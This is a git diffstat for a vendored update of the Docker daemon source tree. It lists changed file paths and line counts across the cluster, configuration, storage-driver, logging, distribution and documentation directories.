 .../cluster/executor/container/container.go   |  198 +-
 .../executor/container/container_test.go      |   37 +
 .../cluster/executor/container/controller.go  |  188 +-
 .../cluster/executor/container/errors.go      |   12 +-
 .../cluster/executor/container/executor.go    |  155 +-
 .../cluster/executor/container/health_test.go |   22 +-
 .../cluster/executor/container/validate.go    |    5 +-
 .../executor/container/validate_test.go       |    7 +-
 .../executor/container/validate_unix_test.go  |    2 +-
 .../container/validate_windows_test.go        |    2 +-
 .../docker/docker/daemon/cluster/filters.go   |   41 +-
 .../docker/daemon/cluster/filters_test.go     |  102 +
 .../docker/docker/daemon/cluster/helpers.go   |  260 +-
 .../docker/daemon/cluster/listen_addr.go      |  125 +-
 .../daemon/cluster/listen_addr_linux.go       |    4 +-
 .../daemon/cluster/listen_addr_others.go      |    4 +-
 .../daemon/cluster/listen_addr_solaris.go     |   57 -
 .../docker/docker/daemon/cluster/networks.go  |  316 +
 .../docker/daemon/cluster/noderunner.go       |  388 ++
 .../docker/docker/daemon/cluster/nodes.go     |  105 +
 .../docker/daemon/cluster/provider/network.go |    2 +-
 .../docker/docker/daemon/cluster/secrets.go   |  147 +-
 .../docker/docker/daemon/cluster/services.go  |  602 ++
 .../docker/docker/daemon/cluster/swarm.go     |  569 ++
 .../docker/docker/daemon/cluster/tasks.go     |   87 +
 .../docker/docker/daemon/cluster/utils.go     |   63 +
 .../github.com/docker/docker/daemon/commit.go |  165 +-
 .../docker/daemon/{ => config}/config.go      |  296 +-
 .../daemon/config/config_common_unix.go       |   71 +
 .../daemon/config/config_common_unix_test.go  |   84 +
 .../docker/daemon/config/config_test.go       |  518 ++
 .../docker/daemon/config/config_unix.go       |   87 +
 .../docker/daemon/config/config_unix_test.go  |  134 +
 .../docker/daemon/config/config_windows.go    |   57 +
 .../daemon/config/config_windows_test.go      |   60 +
 .../docker/docker/daemon/config/opts.go       |   22 +
 .../docker/daemon/config_common_unix.go       |   90 -
 .../docker/daemon/config_experimental.go      |    8 -
 .../docker/docker/daemon/config_solaris.go    |   47 -
 .../docker/docker/daemon/config_test.go       |  229 -
 .../docker/docker/daemon/config_unix.go       |  104 -
 .../docker/docker/daemon/config_unix_test.go  |   80 -
 .../docker/docker/daemon/config_windows.go    |   71 -
 .../docker/daemon/config_windows_test.go      |   59 -
 .../docker/docker/daemon/configs.go           |   21 +
 .../docker/docker/daemon/configs_linux.go     |    5 +
 .../docker/daemon/configs_unsupported.go      |    7 +
 .../docker/docker/daemon/configs_windows.go   |    5 +
 .../docker/docker/daemon/container.go         |  144 +-
 .../docker/docker/daemon/container_linux.go   |   30 +
 .../docker/daemon/container_operations.go     |  243 +-
 .../daemon/container_operations_solaris.go    |   46 -
 .../daemon/container_operations_unix.go       |  288 +-
 .../daemon/container_operations_windows.go    |  160 +-
 .../docker/daemon/container_unix_test.go      |   44 +
 .../docker/docker/daemon/container_windows.go |    9 +
 .../github.com/docker/docker/daemon/create.go |  194 +-
 .../docker/docker/daemon/create_test.go       |   21 +
 .../docker/docker/daemon/create_unix.go       |   33 +-
 .../docker/docker/daemon/create_windows.go    |   35 +-
 .../github.com/docker/docker/daemon/daemon.go | 1105 ++-
 .../docker/daemon/daemon_experimental.go      |    7 -
 .../docker/docker/daemon/daemon_linux.go      |   61 +-
 .../docker/docker/daemon/daemon_linux_test.go |  226 +-
 .../docker/docker/daemon/daemon_solaris.go    |  523 --
 .../docker/docker/daemon/daemon_test.go       |  394 +-
 .../docker/docker/daemon/daemon_unix.go       |  714 +-
 .../docker/docker/daemon/daemon_unix_test.go  |  167 +-
 .../docker/daemon/daemon_unsupported.go       |    4 +-
 .../docker/docker/daemon/daemon_windows.go    |  277 +-
 .../docker/daemon/daemon_windows_test.go      |   72 +
 .../docker/docker/daemon/debugtrap.go         |   62 -
 .../docker/docker/daemon/debugtrap_unix.go    |   14 +-
 .../docker/daemon/debugtrap_unsupported.go    |    4 +-
 .../docker/docker/daemon/debugtrap_windows.go |   28 +-
 .../github.com/docker/docker/daemon/delete.go |  106 +-
 .../docker/docker/daemon/delete_test.go       |   92 +-
 .../docker/docker/daemon/dependency.go        |   17 +
 .../daemon/{ => discovery}/discovery.go       |   35 +-
 .../docker/daemon/discovery/discovery_test.go |   96 +
 .../docker/docker/daemon/discovery_test.go    |  164 -
 .../docker/docker/daemon/disk_usage.go        |   78 +-
 .../github.com/docker/docker/daemon/errors.go |  166 +-
 .../github.com/docker/docker/daemon/events.go |  226 +-
 .../docker/docker/daemon/events/events.go     |   21 +-
 .../docker/daemon/events/events_test.go       |   27 +-
 .../docker/docker/daemon/events/filter.go     |   38 +-
 .../docker/docker/daemon/events/metrics.go    |    2 +-
 .../daemon/events/testutils/testutils.go      |    2 +-
 .../docker/docker/daemon/events_test.go       |   34 +-
 .../github.com/docker/docker/daemon/exec.go   |  152 +-
 .../docker/docker/daemon/exec/exec.go         |   60 +-
 .../docker/docker/daemon/exec_linux.go        |   42 +-
 .../docker/docker/daemon/exec_linux_test.go   |   53 +
 .../docker/docker/daemon/exec_solaris.go      |   11 -
 .../docker/docker/daemon/exec_windows.go      |   12 +-
 .../github.com/docker/docker/daemon/export.go |   54 +-
 .../docker/docker/daemon/getsize_unix.go      |   41 -
 .../docker/daemon/graphdriver/aufs/aufs.go    |  235 +-
 .../daemon/graphdriver/aufs/aufs_test.go      |  173 +-
 .../docker/daemon/graphdriver/aufs/dirs.go    |    6 +-
 .../docker/daemon/graphdriver/aufs/mount.go   |   12 +-
 .../daemon/graphdriver/aufs/mount_linux.go    |    6 +-
 .../graphdriver/aufs/mount_unsupported.go     |    2 +-
 .../docker/daemon/graphdriver/btrfs/btrfs.go  |  285 +-
 .../daemon/graphdriver/btrfs/btrfs_test.go    |    6 +-
 .../graphdriver/btrfs/dummy_unsupported.go    |    2 +-
 .../daemon/graphdriver/btrfs/version.go       |    2 +-
 .../daemon/graphdriver/btrfs/version_none.go  |    2 +-
 .../daemon/graphdriver/btrfs/version_test.go  |    4 +-
 .../docker/daemon/graphdriver/copy/copy.go    |  277 +
 .../daemon/graphdriver/copy/copy_test.go      |  159 +
 .../docker/daemon/graphdriver/counter.go      |   39 +-
 .../daemon/graphdriver/devmapper/README.md    |   16 +-
 .../graphdriver/devmapper/device_setup.go     |  231 +
 .../daemon/graphdriver/devmapper/deviceset.go |  661 +-
 .../graphdriver/devmapper/devmapper_doc.go    |    2 +-
 .../graphdriver/devmapper/devmapper_test.go   |  107 +-
 .../daemon/graphdriver/devmapper/driver.go    |  121 +-
 .../daemon/graphdriver/devmapper/mount.go     |   25 +-
 .../docker/daemon/graphdriver/driver.go       |   81 +-
 .../daemon/graphdriver/driver_freebsd.go      |   16 +-
 .../docker/daemon/graphdriver/driver_linux.go |   31 +-
 .../daemon/graphdriver/driver_solaris.go      |   97 -
 .../docker/daemon/graphdriver/driver_test.go  |   36 +
 .../daemon/graphdriver/driver_unsupported.go  |   10 +-
 .../daemon/graphdriver/driver_windows.go      |    8 +-
 .../docker/daemon/graphdriver/errors.go       |   36 +
 .../docker/daemon/graphdriver/fsdiff.go       |   30 +-
 .../graphdriver/graphtest/graphbench_unix.go  |   12 +-
 .../graphdriver/graphtest/graphtest_unix.go   |   92 +-
 .../graphtest/graphtest_windows.go            |    2 +-
 .../daemon/graphdriver/graphtest/testutil.go  |   91 +-
 .../graphdriver/graphtest/testutil_unix.go    |  140 +-
 .../docker/daemon/graphdriver/lcow/lcow.go    | 1052 +++
 .../daemon/graphdriver/lcow/lcow_svm.go       |  378 +
 .../daemon/graphdriver/lcow/remotefs.go       |  139 +
 .../daemon/graphdriver/lcow/remotefs_file.go  |  211 +
 .../graphdriver/lcow/remotefs_filedriver.go   |  123 +
 .../graphdriver/lcow/remotefs_pathdriver.go   |  212 +
 .../docker/daemon/graphdriver/overlay/copy.go |  174 -
 .../daemon/graphdriver/overlay/overlay.go     |  192 +-
 .../graphdriver/overlay/overlay_test.go       |    2 +-
 .../overlay/overlay_unsupported.go            |    2 +-
 .../daemon/graphdriver/overlay2/check.go      |   75 +-
 .../daemon/graphdriver/overlay2/mount.go      |   11 +-
 .../daemon/graphdriver/overlay2/overlay.go    |  273 +-
 .../graphdriver/overlay2/overlay_test.go      |   14 +-
 .../overlay2/overlay_unsupported.go           |    2 +-
 .../daemon/graphdriver/overlay2/randomid.go   |    7 +-
 .../graphdriver/overlayutils/overlayutils.go  |   15 +-
 .../docker/daemon/graphdriver/plugin.go       |   40 +-
 .../docker/docker/daemon/graphdriver/proxy.go |  100 +-
 .../docker/daemon/graphdriver/quota/errors.go |   19 +
 .../daemon/graphdriver/quota/projectquota.go  |   87 +-
 .../graphdriver/quota/projectquota_test.go    |  152 +
 .../graphdriver/register/register_aufs.go     |    2 +-
 .../graphdriver/register/register_btrfs.go    |    2 +-
 .../register/register_devicemapper.go         |    4 +-
 .../graphdriver/register/register_overlay.go  |    3 +-
 .../graphdriver/register/register_overlay2.go |    8 +
 .../graphdriver/register/register_vfs.go      |    2 +-
 .../graphdriver/register/register_windows.go  |    5 +-
 .../graphdriver/register/register_zfs.go      |    4 +-
 .../daemon/graphdriver/vfs/copy_linux.go      |    7 +
 .../graphdriver/vfs/copy_unsupported.go       |    9 +
 .../docker/daemon/graphdriver/vfs/driver.go   |   94 +-
 .../daemon/graphdriver/vfs/quota_linux.go     |   26 +
 .../graphdriver/vfs/quota_unsupported.go      |   20 +
 .../docker/daemon/graphdriver/vfs/vfs_test.go |    6 +-
 .../daemon/graphdriver/windows/windows.go     |  140 +-
 .../docker/daemon/graphdriver/zfs/zfs.go      |  100 +-
 .../daemon/graphdriver/zfs/zfs_freebsd.go     |   12 +-
 .../daemon/graphdriver/zfs/zfs_linux.go       |   23 +-
 .../daemon/graphdriver/zfs/zfs_solaris.go     |   59 -
 .../docker/daemon/graphdriver/zfs/zfs_test.go |    4 +-
 .../daemon/graphdriver/zfs/zfs_unsupported.go |    4 +-
 .../github.com/docker/docker/daemon/health.go |   98 +-
 .../docker/docker/daemon/health_test.go       |   80 +-
 .../github.com/docker/docker/daemon/image.go  |   76 -
 .../docker/docker/daemon/image_tag.go         |   37 -
 .../docker/docker/daemon/images/cache.go      |   27 +
 .../docker/docker/daemon/images/image.go      |   64 +
 .../docker/daemon/images/image_builder.go     |  219 +
 .../docker/daemon/images/image_commit.go      |  127 +
 .../daemon/{ => images}/image_delete.go       |  126 +-
 .../docker/daemon/images/image_events.go      |   39 +
 .../daemon/{ => images}/image_exporter.go     |   10 +-
 .../daemon/{ => images}/image_history.go      |   29 +-
 .../{import.go => images/image_import.go}     |   61 +-
 .../daemon/{ => images}/image_inspect.go      |   52 +-
 .../docker/daemon/images/image_prune.go       |  211 +
 .../docker/daemon/{ => images}/image_pull.go  |   86 +-
 .../docker/daemon/{ => images}/image_push.go  |   29 +-
 .../{search.go => images/image_search.go}     |   33 +-
 .../image_search_test.go}                     |   17 +-
 .../docker/docker/daemon/images/image_tag.go  |   41 +
 .../docker/docker/daemon/images/image_unix.go |   45 +
 .../docker/daemon/images/image_windows.go     |   41 +
 .../docker/daemon/{ => images}/images.go      |   99 +-
 .../docker/docker/daemon/images/locals.go     |   32 +
 .../docker/docker/daemon/images/service.go    |  251 +
 .../github.com/docker/docker/daemon/info.go   |   98 +-
 .../docker/docker/daemon/info_unix.go         |   77 +-
 .../docker/docker/daemon/info_unix_test.go    |   53 +
 .../docker/docker/daemon/info_windows.go      |    2 +-
 .../docker/daemon/initlayer/setup_solaris.go  |   13 -
 .../docker/daemon/initlayer/setup_unix.go     |   18 +-
 .../docker/daemon/initlayer/setup_windows.go  |    9 +-
 .../docker/docker/daemon/inspect.go           |   89 +-
 .../{inspect_unix.go => inspect_linux.go}     |   23 +-
 .../docker/docker/daemon/inspect_solaris.go   |   41 -
 .../docker/docker/daemon/inspect_test.go      |   33 +
 .../docker/docker/daemon/inspect_windows.go   |   17 +-
 .../github.com/docker/docker/daemon/keys.go   |    2 +-
 .../docker/docker/daemon/keys_unsupported.go  |    4 +-
 .../github.com/docker/docker/daemon/kill.go   |   68 +-
 .../github.com/docker/docker/daemon/links.go  |   10 +-
 .../docker/docker/daemon/links/links.go       |    2 +-
 .../docker/docker/daemon/links/links_test.go  |   18 +-
 .../docker/docker/daemon/links_linux.go       |   72 -
 .../docker/docker/daemon/links_linux_test.go  |   98 -
 .../docker/docker/daemon/links_notlinux.go    |   10 -
 .../github.com/docker/docker/daemon/list.go   |  441 +-
 .../docker/docker/daemon/list_test.go         |   26 +
 .../docker/docker/daemon/list_unix.go         |    6 +-
 .../docker/docker/daemon/list_windows.go      |    4 +-
 .../docker/daemon/listeners/group_unix.go     |   34 +
 .../listeners/listeners_linux.go}             |   28 +-
 .../listeners/listeners_windows.go            |    2 +-
 .../docker/docker/daemon/logdrivers_linux.go  |    2 +-
 .../docker/daemon/logdrivers_windows.go       |    3 +-
 .../docker/docker/daemon/logger/adapter.go    |  139 +
 .../docker/daemon/logger/adapter_test.go      |  216 +
 .../daemon/logger/awslogs/cloudwatchlogs.go   |  522 +-
 .../logger/awslogs/cloudwatchlogs_test.go     |  739 +-
 .../logger/awslogs/cwlogsiface_mock_test.go   |   46 +-
 .../docker/docker/daemon/logger/copier.go     |   77 +-
 .../docker/daemon/logger/copier_test.go       |  202 +-
 .../daemon/logger/etwlogs/etwlogs_windows.go  |   58 +-
 .../docker/docker/daemon/logger/factory.go    |   72 +-
 .../docker/daemon/logger/fluentd/fluentd.go   |   89 +-
 .../daemon/logger/gcplogs/gcplogging.go       |  144 +-
 .../daemon/logger/gcplogs/gcplogging_linux.go |   29 +
 .../logger/gcplogs/gcplogging_others.go       |    7 +
 .../docker/docker/daemon/logger/gelf/gelf.go  |  147 +-
 .../docker/daemon/logger/gelf/gelf_test.go    |  260 +
 .../daemon/logger/gelf/gelf_unsupported.go    |    3 -
 .../docker/daemon/logger/journald/journald.go |   43 +-
 .../daemon/logger/journald/journald_test.go   |    2 +-
 .../logger/journald/journald_unsupported.go   |    2 +-
 .../docker/daemon/logger/journald/read.go     |  116 +-
 .../daemon/logger/journald/read_native.go     |    2 +-
 .../logger/journald/read_native_compat.go     |    2 +-
 .../logger/journald/read_unsupported.go       |    2 +-
 .../daemon/logger/jsonfilelog/jsonfilelog.go  |  112 +-
 .../logger/jsonfilelog/jsonfilelog_test.go    |  222 +-
 .../logger/jsonfilelog/jsonlog/jsonlog.go     |   25 +
 .../jsonfilelog}/jsonlog/jsonlogbytes.go      |   31 +-
 .../jsonfilelog/jsonlog/jsonlogbytes_test.go  |   51 +
 .../jsonfilelog/jsonlog/time_marshalling.go   |   20 +
 .../jsonlog/time_marshalling_test.go          |   34 +
 .../docker/daemon/logger/jsonfilelog/read.go  |  316 +-
 .../daemon/logger/jsonfilelog/read_test.go    |   64 +
 .../daemon/logger/logentries/logentries.go    |   61 +-
 .../docker/docker/daemon/logger/logger.go     |  119 +-
 .../docker/daemon/logger/logger_test.go       |   29 +-
 .../daemon/logger/loggerutils/log_tag.go      |   10 +-
 .../daemon/logger/loggerutils/log_tag_test.go |   20 +-
 .../daemon/logger/loggerutils/logfile.go      |  666 ++
 .../loggerutils/multireader}/multireader.go   |   29 +-
 .../multireader}/multireader_test.go          |   20 +-
 .../logger/loggerutils/rotatefilewriter.go    |  124 -
 .../daemon/logger/{context.go => loginfo.go}  |   78 +-
 .../docker/docker/daemon/logger/metrics.go    |   21 +
 .../docker/docker/daemon/logger/plugin.go     |  116 +
 .../docker/daemon/logger/plugin_unix.go       |   23 +
 .../daemon/logger/plugin_unsupported.go       |   12 +
 .../docker/docker/daemon/logger/proxy.go      |  107 +
 .../docker/docker/daemon/logger/ring.go       |  223 +
 .../docker/docker/daemon/logger/ring_test.go  |  299 +
 .../docker/daemon/logger/splunk/splunk.go     |  114 +-
 .../daemon/logger/splunk/splunk_test.go       |  251 +-
 .../logger/splunk/splunkhecmock_test.go       |   29 +-
 .../docker/daemon/logger/syslog/syslog.go     |   32 +-
 .../daemon/logger/syslog/syslog_test.go       |    2 +-
 .../daemon/logger/templates/templates.go      |   50 +
 .../daemon/logger/templates/templates_test.go |   19 +
 .../github.com/docker/docker/daemon/logs.go   |  209 +-
 .../docker/docker/daemon/logs_test.go         |    2 +-
 .../docker/docker/daemon/metrics.go           |  166 +-
 .../docker/docker/daemon/metrics_unix.go      |   60 +
 .../docker/daemon/metrics_unsupported.go      |   12 +
 .../docker/docker/daemon/monitor.go           |  250 +-
 .../docker/docker/daemon/monitor_linux.go     |   19 -
 .../docker/docker/daemon/monitor_solaris.go   |   18 -
 .../docker/docker/daemon/monitor_windows.go   |   46 -
 .../github.com/docker/docker/daemon/mounts.go |   45 +-
 .../github.com/docker/docker/daemon/names.go  |   39 +-
 .../docker/{utils => daemon/names}/names.go   |    2 +-
 .../docker/docker/daemon/network.go           |  698 +-
 .../docker/docker/daemon/network/settings.go  |   38 +-
 vendor/github.com/docker/docker/daemon/oci.go |   78 +
 .../docker/docker/daemon/oci_linux.go         |  415 +-
 .../docker/docker/daemon/oci_linux_test.go    |  102 +
 .../docker/docker/daemon/oci_solaris.go       |  188 -
 .../docker/docker/daemon/oci_windows.go       |  359 +-
 .../github.com/docker/docker/daemon/pause.go  |   26 +-
 .../github.com/docker/docker/daemon/prune.go  |  344 +-
 .../github.com/docker/docker/daemon/reload.go |  324 +
 .../docker/docker/daemon/reload_test.go       |  573 ++
 .../docker/docker/daemon/reload_unix.go       |   56 +
 .../docker/docker/daemon/reload_windows.go    |    9 +
 .../github.com/docker/docker/daemon/rename.go |   35 +-
 .../github.com/docker/docker/daemon/resize.go |   18 +-
 .../docker/docker/daemon/resize_test.go       |  103 +
 .../docker/docker/daemon/restart.go           |    6 +-
 .../docker/docker/daemon/seccomp_disabled.go  |    2 +-
 .../docker/docker/daemon/seccomp_linux.go     |    6 +-
 .../docker/daemon/seccomp_unsupported.go      |    2 +-
 .../docker/docker/daemon/secrets.go           |   17 +-
 .../docker/docker/daemon/secrets_linux.go     |    4 +-
 .../docker/daemon/secrets_unsupported.go      |    4 +-
 .../docker/docker/daemon/secrets_windows.go   |    5 +
 .../docker/docker/daemon/selinux_linux.go     |   10 +-
 .../docker/daemon/selinux_unsupported.go      |    2 +-
 .../github.com/docker/docker/daemon/start.go  |  164 +-
 .../docker/docker/daemon/start_unix.go        |   50 +-
 .../docker/docker/daemon/start_windows.go     |  217 +-
 .../github.com/docker/docker/daemon/stats.go  |   17 +-
 .../docker/docker/daemon/stats/collector.go   |  159 +
 .../collector_unix.go}                        |   32 +-
 .../docker/daemon/stats/collector_windows.go  |   17 +
 .../docker/docker/daemon/stats_collector.go   |  132 +-
 .../docker/daemon/stats_collector_solaris.go  |   34 -
 .../docker/daemon/stats_collector_windows.go  |   15 -
 .../docker/docker/daemon/stats_unix.go        |    7 +-
 .../docker/docker/daemon/stats_windows.go     |    2 +-
 .../github.com/docker/docker/daemon/stop.go   |   68 +-
 .../{api/fixtures => daemon/testdata}/keyfile |    0
 .../docker/docker/daemon/top_unix.go          |  101 +-
 .../docker/docker/daemon/top_unix_test.go     |   15 +-
 .../docker/docker/daemon/top_windows.go       |   20 +-
 .../docker/docker/daemon/trustkey.go          |   57 +
 .../docker/docker/daemon/trustkey_test.go     |   71 +
 .../docker/docker/daemon/unpause.go           |   22 +-
 .../github.com/docker/docker/daemon/update.go |   45 +-
 .../docker/docker/daemon/update_linux.go      |   59 +-
 .../docker/docker/daemon/update_solaris.go    |   11 -
 .../docker/docker/daemon/update_windows.go    |   10 +-
 .../docker/docker/daemon/util_test.go         |   65 +
 .../docker/docker/daemon/volumes.go           |  334 +-
 .../docker/docker/daemon/volumes_linux.go     |   36 +
 .../docker/daemon/volumes_linux_test.go       |   56 +
 .../docker/docker/daemon/volumes_unit_test.go |    9 +-
 .../docker/docker/daemon/volumes_unix.go      |  111 +-
 .../docker/docker/daemon/volumes_unix_test.go |  256 +
 .../docker/docker/daemon/volumes_windows.go   |   20 +-
 .../github.com/docker/docker/daemon/wait.go   |   37 +-
 .../docker/docker/daemon/workdir.go           |    7 +-
 .../docker/docker/distribution/config.go      |   56 +-
 .../docker/docker/distribution/errors.go      |   93 +-
 .../docker/docker/distribution/errors_test.go |   85 +
 .../docker/distribution/metadata/metadata.go  |    2 +-
 .../distribution/metadata/v1_id_service.go    |    2 +-
 .../metadata/v1_id_service_test.go            |    7 +-
 .../metadata/v2_metadata_service.go           |   10 +-
 .../metadata/v2_metadata_service_test.go      |    4 +-
 .../docker/docker/distribution/pull.go        |   50 +-
 .../docker/docker/distribution/pull_v1.go     |   57 +-
 .../docker/docker/distribution/pull_v2.go     |  279 +-
 .../docker/distribution/pull_v2_test.go       |   15 +-
 .../docker/distribution/pull_v2_unix.go       |   25 +-
 .../docker/distribution/pull_v2_windows.go    |  103 +-
 .../docker/docker/distribution/push.go        |   24 +-
 .../docker/docker/distribution/push_v1.go     |   58 +-
 .../docker/docker/distribution/push_v2.go     |  146 +-
 .../docker/distribution/push_v2_test.go       |  219 +-
 .../docker/docker/distribution/registry.go    |   16 +-
 .../docker/distribution/registry_unit_test.go |   24 +-
 .../docker/distribution/utils/progress.go     |    6 +-
 .../docker/distribution/xfer/download.go      |   70 +-
 .../docker/distribution/xfer/download_test.go |   24 +-
 .../docker/distribution/xfer/transfer.go      |    6 +-
 .../docker/distribution/xfer/transfer_test.go |    2 +-
 .../docker/docker/distribution/xfer/upload.go |   24 +-
 .../docker/distribution/xfer/upload_test.go   |    8 +-
 .../docker/docker/dockerversion/useragent.go  |   16 +-
 .../docker/dockerversion/version_lib.go       |   17 +-
 .../github.com/docker/docker/docs/README.md   |   30 -
 .../docker/docker/docs/api/v1.18.md           |   39 +-
 .../docker/docker/docs/api/v1.19.md           |   39 +-
 .../docker/docker/docs/api/v1.20.md           |   37 +-
 .../docker/docker/docs/api/v1.21.md           |   60 +-
 .../docker/docker/docs/api/v1.22.md           |   62 +-
 .../docker/docker/docs/api/v1.23.md           |   73 +-
 .../docker/docker/docs/api/v1.24.md           |  105 +-
 .../docker/docker/docs/api/version-history.md |  179 +-
 .../docker/docker/docs/contributing/README.md |    8 +
 .../docs/contributing/images/branch-sig.png   |  Bin 0 -> 56537 bytes
 .../contributing/images/contributor-edit.png  |  Bin 0 -> 17933 bytes
 .../docs/contributing/images/copy_url.png     |  Bin 0 -> 69486 bytes
 .../docs/contributing/images/fork_docker.png  |  Bin 0 -> 52190 bytes
 .../docs/contributing/images/git_bash.png     |  Bin 0 -> 26097 bytes
 .../docs/contributing/images/list_example.png |  Bin 0 -> 51194 bytes
 .../docs/contributing/set-up-dev-env.md       |  372 +
 .../docker/docs/contributing/set-up-git.md    |  280 +
 .../docs/contributing/software-req-win.md     |  177 +
 .../docs/contributing/software-required.md    |   94 +
 .../docker/docker/docs/contributing/test.md   |  244 +
 .../docs/contributing/who-written-for.md      |   49 +
 .../docker/docker/docs/deprecated.md          |  286 -
 .../docker/docker/docs/extend/EBS_volume.md   |  164 -
 .../docker/docker/docs/extend/config.md       |  225 -
 .../extend/images/authz_additional_info.png   |  Bin 45916 -> 0 bytes
 .../docker/docs/extend/images/authz_allow.png |  Bin 33505 -> 0 bytes
 .../docs/extend/images/authz_chunked.png      |  Bin 33168 -> 0 bytes
 .../extend/images/authz_connection_hijack.png |  Bin 38780 -> 0 bytes
 .../docker/docs/extend/images/authz_deny.png  |  Bin 27099 -> 0 bytes
 .../docker/docker/docs/extend/index.md        |  222 -
 .../docker/docs/extend/legacy_plugins.md      |   98 -
 .../docker/docker/docs/extend/plugin_api.md   |  196 -
 .../docs/extend/plugins_authorization.md      |  260 -
 .../docker/docs/extend/plugins_graphdriver.md |  376 -
 .../docker/docs/extend/plugins_network.md     |   77 -
 .../docker/docs/extend/plugins_volume.md      |  276 -
 .../docker/docker/docs/reference/builder.md   | 1746 -----
 .../docs/reference/commandline/attach.md      |  131 -
 .../docs/reference/commandline/build.md       |  451 --
 .../docker/docs/reference/commandline/cli.md  |  249 -
 .../docs/reference/commandline/commit.md      |   93 -
 .../reference/commandline/container_prune.md  |   47 -
 .../docker/docs/reference/commandline/cp.md   |  112 -
 .../docs/reference/commandline/create.md      |  211 -
 .../docs/reference/commandline/deploy.md      |  101 -
 .../docker/docs/reference/commandline/diff.md |   48 -
 .../reference/commandline/docker_images.gif   |  Bin 35785 -> 0 bytes
 .../docs/reference/commandline/dockerd.md     | 1364 ----
 .../docs/reference/commandline/events.md      |  217 -
 .../docker/docs/reference/commandline/exec.md |   65 -
 .../docs/reference/commandline/export.md      |   43 -
 .../docs/reference/commandline/history.md     |   48 -
 .../docs/reference/commandline/image_prune.md |   71 -
 .../docs/reference/commandline/images.md      |  304 -
 .../docs/reference/commandline/import.md      |   75 -
 .../docs/reference/commandline/index.md       |  178 -
 .../docker/docs/reference/commandline/info.md |  224 -
 .../docs/reference/commandline/inspect.md     |  102 -
 .../docker/docs/reference/commandline/kill.md |   34 -
 .../docker/docs/reference/commandline/load.md |   53 -
 .../docs/reference/commandline/login.md       |  122 -
 .../docs/reference/commandline/logout.md      |   30 -
 .../docker/docs/reference/commandline/logs.md |   66 -
 .../docker/docs/reference/commandline/menu.md |   28 -
 .../reference/commandline/network_connect.md  |  100 -
 .../reference/commandline/network_create.md   |  202 -
 .../commandline/network_disconnect.md         |   43 -
 .../reference/commandline/network_inspect.md  |  192 -
 .../docs/reference/commandline/network_ls.md  |  218 -
 .../reference/commandline/network_prune.md    |   45 -
 .../docs/reference/commandline/network_rm.md  |   59 -
 .../docs/reference/commandline/node_demote.md |   42 -
 .../reference/commandline/node_inspect.md     |  137 -
 .../docs/reference/commandline/node_ls.md     |  130 -
 .../reference/commandline/node_promote.md     |   41 -
 .../docs/reference/commandline/node_ps.md     |  107 -
 .../docs/reference/commandline/node_rm.md     |   73 -
 .../docs/reference/commandline/node_update.md |   71 -
 .../docs/reference/commandline/pause.md       |   40 -
 .../reference/commandline/plugin_create.md    |   60 -
 .../reference/commandline/plugin_disable.md   |   66 -
 .../reference/commandline/plugin_enable.md    |   65 -
 .../reference/commandline/plugin_inspect.md   |  164 -
 .../reference/commandline/plugin_install.md   |   71 -
 .../docs/reference/commandline/plugin_ls.md   |   53 -
 .../docs/reference/commandline/plugin_push.md |   50 -
 .../docs/reference/commandline/plugin_rm.md   |   56 -
 .../docs/reference/commandline/plugin_set.md  |   99 -
 .../reference/commandline/plugin_upgrade.md   |   84 -
 .../docker/docs/reference/commandline/port.md |   41 -
 .../docker/docs/reference/commandline/ps.md   |  384 -
 .../docker/docs/reference/commandline/pull.md |  252 -
 .../docker/docs/reference/commandline/push.md |   75 -
 .../docs/reference/commandline/rename.md      |   27 -
 .../docs/reference/commandline/restart.md     |   26 -
 .../docker/docs/reference/commandline/rm.md   |   69 -
 .../docker/docs/reference/commandline/rmi.md  |   83 -
 .../docker/docs/reference/commandline/run.md  |  732 --
 .../docker/docs/reference/commandline/save.md |   45 -
 .../docs/reference/commandline/search.md      |  134 -
 .../reference/commandline/secret_create.md    |   90 -
 .../reference/commandline/secret_inspect.md   |   85 -
 .../docs/reference/commandline/secret_ls.md   |   43 -
 .../docs/reference/commandline/secret_rm.md   |   48 -
 .../reference/commandline/service_create.md   |  556 --
 .../reference/commandline/service_inspect.md  |  162 -
 .../reference/commandline/service_logs.md     |   77 -
 .../docs/reference/commandline/service_ls.md  |  114 -
 .../docs/reference/commandline/service_ps.md  |  161 -
 .../docs/reference/commandline/service_rm.md  |   55 -
 .../reference/commandline/service_scale.md    |   96 -
 .../reference/commandline/service_update.md   |  181 -
 .../reference/commandline/stack_deploy.md     |   98 -
 .../docs/reference/commandline/stack_ls.md    |   47 -
 .../docs/reference/commandline/stack_ps.md    |   51 -
 .../docs/reference/commandline/stack_rm.md    |   38 -
 .../reference/commandline/stack_services.md   |   70 -
 .../docs/reference/commandline/start.md       |   28 -
 .../docs/reference/commandline/stats.md       |  117 -
 .../docker/docs/reference/commandline/stop.md |   29 -
 .../docs/reference/commandline/swarm_init.md  |  142 -
 .../docs/reference/commandline/swarm_join.md  |  102 -
 .../reference/commandline/swarm_join_token.md |  105 -
 .../docs/reference/commandline/swarm_leave.md |   58 -
 .../reference/commandline/swarm_unlock.md     |   41 -
 .../reference/commandline/swarm_unlock_key.md |   84 -
 .../reference/commandline/swarm_update.md     |   45 -
 .../docs/reference/commandline/system_df.md   |   76 -
 .../reference/commandline/system_prune.md     |   79 -
 .../docker/docs/reference/commandline/tag.md  |   74 -
 .../docker/docs/reference/commandline/top.md  |   25 -
 .../docs/reference/commandline/unpause.md     |   36 -
 .../docs/reference/commandline/update.md      |  120 -
 .../docs/reference/commandline/version.md     |   67 -
 .../reference/commandline/volume_create.md    |   91 -
 .../reference/commandline/volume_inspect.md   |   59 -
 .../docs/reference/commandline/volume_ls.md   |  183 -
 .../reference/commandline/volume_prune.md     |   54 -
 .../docs/reference/commandline/volume_rm.md   |   42 -
 .../docker/docs/reference/commandline/wait.md |   25 -
 .../docker/docker/docs/reference/glossary.md  |  286 -
 .../docker/docker/docs/reference/index.md     |   21 -
 .../docker/docker/docs/reference/run.md       | 1555 -----
 .../static_files/docker-logo-compressed.png   |  Bin 4972 -> 0 bytes
 .../docs/static_files/moby-project-logo.png   |  Bin 0 -> 20458 bytes
 .../github.com/docker/docker/errdefs/defs.go  |   74 +
 .../github.com/docker/docker/errdefs/doc.go   |    8 +
 .../docker/docker/errdefs/helpers.go          |  240 +
 .../docker/docker/errdefs/helpers_test.go     |  194 +
 vendor/github.com/docker/docker/errdefs/is.go |  114 +
 .../docker/docker/experimental/README.md      |   44 -
 .../docker/experimental/checkpoint-restore.md |   88 -
 .../experimental/docker-stacks-and-bundles.md |  202 -
 .../experimental/images/ipvlan-l3.gliffy      |    1 -
